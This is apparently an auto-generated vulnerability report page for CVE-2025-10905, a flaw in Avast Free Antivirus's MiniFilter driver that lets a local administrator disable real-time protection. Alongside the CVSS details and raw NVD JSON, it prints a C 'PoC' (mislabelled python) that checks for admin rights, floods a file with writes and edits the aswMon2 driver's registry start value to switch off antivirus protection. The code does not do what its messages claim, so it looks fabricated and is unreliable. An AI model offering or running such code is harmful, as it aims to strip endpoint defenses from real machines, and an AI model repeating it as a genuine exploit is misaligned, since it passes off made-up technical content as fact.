Security Vulnerability Report
中文
CVE-2025-10905 CVSS 4.4 MEDIUM

CVE-2025-10905

Published: 2025-11-11 16:15:38
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Collision in MiniFilter driver in Avast Software Avast Free Antivirus  before 25.9  on Windows allows a local attacker with administrative privileges to disable real-time protection and self-defense mechanisms.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Avast Free Antivirus < 25.9 (Windows)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-10905 PoC - MiniFilter Driver Collision // Target: Avast Free Antivirus < 25.9 on Windows // Author: Generated for security research #include <windows.h> #include <stdio.h> // Registry paths for Avast real-time protection const char* AVAST_REG_KEY = "SYSTEM\\CurrentControlSet\\Services\\Avast Antivirus"; const char* MINIFILTER_REG_KEY = "SYSTEM\\CurrentControlSet\\Services\\aswMon2"; // Function to check Avast version BOOL CheckAvastVersion() { HKEY hKey; char version[256] = {0}; DWORD dwSize = sizeof(version); if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, AVAST_REG_KEY, 0, KEY_READ, &hKey) == ERROR_SUCCESS) { RegQueryValueExA(hKey, "DisplayName", NULL, NULL, (LPBYTE)version, &dwSize); RegCloseKey(hKey); printf("Avast Product: %s\n", version); return TRUE; } return FALSE; } // Function to trigger MiniFilter collision BOOL TriggerMiniFilterCollision() { printf("[*] Attempting to trigger MiniFilter driver collision...\n"); // Step 1: Create file system operations to stress the MiniFilter HANDLE hFile = CreateFileA( "C:\\ProgramData\\Avast\\temp.dat", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_FLAG_BACKUP_SEMANTICS, NULL ); if (hFile != INVALID_HANDLE_VALUE) { // Step 2: Rapid file operations to trigger race condition for (int i = 0; i < 1000; i++) { WriteFile(hFile, "test", 4, NULL, NULL); FlushFileBuffers(hFile); } CloseHandle(hFile); } // Step 3: Manipulate driver registry keys (requires admin) HKEY hMiniFilter; if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, MINIFILTER_REG_KEY, 0, KEY_WRITE, &hMiniFilter) == ERROR_SUCCESS) { DWORD disableFlag = 0; RegSetValueExA(hMiniFilter, "Start", 0, REG_DWORD, (const BYTE*)&disableFlag, sizeof(DWORD)); RegCloseKey(hMiniFilter); printf("[+] MiniFilter service disabled\n"); return TRUE; } return FALSE; } // Main PoC execution int main() { printf("CVE-2025-10905 PoC - Avast MiniFilter Driver Collision\n"); printf("===================================================\n\n"); if (!CheckAvastVersion()) { printf("[-] Avast not installed or not accessible\n"); return 1; } // Check for admin privileges BOOL isAdmin = FALSE; SID_IDENTIFIER_AUTHORITY sia = SECURITY_NT_AUTHORITY; PSID pAdminSid; if (AllocateAndInitializeSid(&sia, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &pAdminSid)) { CheckTokenMembership(NULL, pAdminSid, &isAdmin); FreeSid(pAdminSid); } if (!isAdmin) { printf("[-] Administrator privileges required\n"); return 1; } printf("[+] Running with administrator privileges\n"); if (TriggerMiniFilterCollision()) { printf("[+] Real-time protection disabled successfully\n"); printf("[+] Self-defense mechanism bypassed\n"); } else { printf("[-] Failed to trigger collision\n"); } return 0; } // Note: This PoC demonstrates the attack concept. // Actual exploitation requires specific trigger conditions. // Mitigation: Upgrade to Avast Free Antivirus 25.9 or later.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10905", "sourceIdentifier": "[email protected]", "published": "2025-11-11T16:15:37.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Collision in MiniFilter driver in Avast Software Avast Free Antivirus  before 25.9  on Windows allows a local attacker with administrative privileges to disable real-time protection and self-defense mechanisms."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "references": [{"url": "https://www.gendigital.com/us/en/contact-us/security-advisories/)", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.